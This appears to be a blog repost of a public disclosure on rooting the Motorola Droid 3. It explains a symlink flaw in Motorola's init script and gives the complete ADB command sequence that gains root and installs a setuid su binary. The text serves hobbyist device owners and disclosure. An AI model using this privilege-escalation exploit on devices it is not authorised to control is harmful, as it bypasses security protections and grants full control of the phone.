Motorola Droid 3 gets rooted!! Find out how to root your’s!

Share article:

A member of XDA forum, djrbliss (Dan Rosenberg) managed to successfully attain root on  Motorola Droid 3. The smartphone got rooted almost a month after its official release world-wide.

Full disclosure how to get your Moto D3 rooted down below and if you cant do it manually use this method with 1 click root from RootzWiki.

The Bug

I identified a vulnerability specific to Motorola devices in the script parsed by the init thread (this is existing code, not commands for you to run):

    mkdir /data/local 0771 mot_tcmd shell
    mkdir /data/local/tmp 0771 mot_tcmd shell
    mkdir /data/local/12m 0771 mot_tcmd shell
    mkdir /data/local/12m/batch 0771 mot_tcmd shell
    chown mot_tcmd shell /data/local
    chown mot_tcmd shell /data/local/12m
    chown mot_tcmd shell /data/local/12m/batch
    chown mot_tcmd shell /data/local/tmp

Since the contents of /data/local are group “shell” and group-writable, we can change the contents of this directory using ADB. By logging into the device and replacing one of the sub-directories listed here with a symbolic link, then when the device reboots it will change the ownership of the symlink target to group “shell”. This can be used to edit property files to manipulate the behavior of ADB to achieve root.

So, without further ado:

The Exploit

Log in to the device using “adb shell” and type the following commands:

mv /data/local/12m /data/local/12m.bak
ln -s /data /data/local/12m

Next, physically reboot the device by pressing the power button. When it wakes up, log in using “adb shell” again, and type the following:

rm /data/local/12m
mv /data/local/12m.bak /data/local/12m
mv /data/local.prop /data/local.prop.bak
echo "ro.sys.atvc_allow_netmon_usb=0" > /data/local.prop
echo "ro.sys.atvc_allow_netmon_ih=0" >> /data/local.prop
echo "ro.sys.atvc_allow_res_core=0" >> /data/local.prop
echo "ro.sys.atvc_allow_res_panic=0" >> /data/local.prop
echo "ro.sys.atvc_allow_all_adb=1" >> /data/local.prop
echo "ro.sys.atvc_allow_all_core=0" >> /data/local.prop
echo "ro.sys.atvc_allow_efem=0" >> /data/local.prop
echo "ro.sys.atvc_allow_bp_log=0" >> /data/local.prop
echo "ro.sys.atvc_allow_ap_mot_log=0" >> /data/local.prop
echo "ro.sys.atvc_allow_gki_log=0" >> /data/local.prop

The ro.sys.atvc_allow_all_adb property is a Motorola-specific configuration that prevents ADB from dropping its root privileges. Reboot the device one last time, and on logging in with “adb shell”, you should get prompt with a root console. Enjoy!

adb remount
adb push su /system/bin
adb shell chmod 6755 /system/bin/su

source: Vulnfactory via XDA Forum via RootzWiki

 

Share article:

Leave a Reply

Your email address will not be published. Required fields are marked *